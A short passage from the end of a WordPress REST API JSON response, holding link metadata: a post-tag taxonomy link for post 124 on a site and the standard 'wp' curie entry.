},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=124"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}